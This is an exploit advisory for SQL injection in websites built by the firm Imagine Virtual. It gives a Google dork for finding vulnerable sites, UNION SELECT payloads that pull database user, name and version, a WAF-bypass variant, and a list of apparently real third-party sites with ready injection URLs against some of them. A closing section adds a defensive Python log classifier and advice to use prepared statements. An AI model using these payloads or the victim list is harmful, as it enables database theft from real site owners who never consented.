Imagine virtual SQL Injection Vulnerability

2012.12.16
Credit: Sys32
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Imagine virtual Sql Injection Vulnerability
# Google Dork: intext:"Design by imagine virtual" inurl:".php?id="
# Date: 15/12/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.imaginevirtual.com
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to sql injection, allowing an attacker to gain full access to the database.
# Some injections need WAF bypass
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-7' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote sql injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Demo Site:

http://www.fotoXXraflores.com/loja.php?id=4
http://www.foXXiraflores.com/loja.php?id=4' //unable load properly

http://www.incasadesign.com/quadros.php?id=204
http://www.incasadesign.com/quadros.php?id=204' //unable load properly

http://www.pizzXXdozoo.com/produto.php?id=7
http://www.pizzXXozoo.com/produto.php?id=7' // error !

http://www.in-timeclinic.com/especialidade.php?id=13
http://www.in-timeclinic.com/especialidade.php?id=13' // error

http://queXXnte.com/dynamic.php?id=15
http://qXXente.com/dynamic.php?id=15' //unable load properly

http://www.peXXtauto.pt/auto.php?id=74
http://www.perXXauto.pt/auto.php?id=74' //unable load properly

Demo Injection:

http://www.pizzXXozoo.com/produto.php?id=-7' /*!20000union*/+/*!20000SelEct*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+

http://www.incXXXdesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
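
For defenders triaging access logs against the patterns above, the following added example (not part of the original advisory or the vendor's code) shows why a keyword filter misses the "WAF Bypass" form and how normalizing MySQL versioned comments before matching closes that gap. The function names `normalize` and `classify_id` are hypothetical, and the sample requests are constructed after the advisory's 127.0.0.1 examples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL executes the body of /*!NNNNN ... */ when the server version is at
# least NNNNN, so a filter has to unwrap it instead of skipping it as a comment.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")
PLAIN_ID = re.compile(r"[0-9]{1,10}")


def normalize(value: str) -> str:
    """Unwrap versioned comments, drop plain ones, fold whitespace and case."""
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return " ".join(value.split()).lower()


def classify_id(url: str) -> str:
    """Return 'ok', 'union-select' or 'non-integer' for the id parameter."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = query.get("id", [""])[0]  # parse_qs already decodes %xx and '+'
    if PLAIN_ID.fullmatch(raw):
        return "ok"
    if UNION_SELECT.search(normalize(raw)):
        return "union-select"
    return "non-integer"


# Constructed sample requests, modelled on the advisory's 127.0.0.1 examples.
SAMPLES = [
    "http://127.0.0.1/vull-page.php?id=4",
    "http://127.0.0.1/vull-page.php?id=4'",
    "http://127.0.0.1/vull-page.php?id=-3 union select 1,2,user(),4--",
    "http://127.0.0.1/vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,user(),4--",
    "http://127.0.0.1/vull-page.php?id=-3%20union/**/select%201,2,3,4--",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(f"{classify_id(url):13} {url}")
```

Anything other than `ok` on a numeric `id` parameter is worth reviewing; the durable fix is in the application, which should bind `id` as an integer parameter in a prepared statement instead of concatenating it into the query.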

References:

http://www.imaginevirtual.com

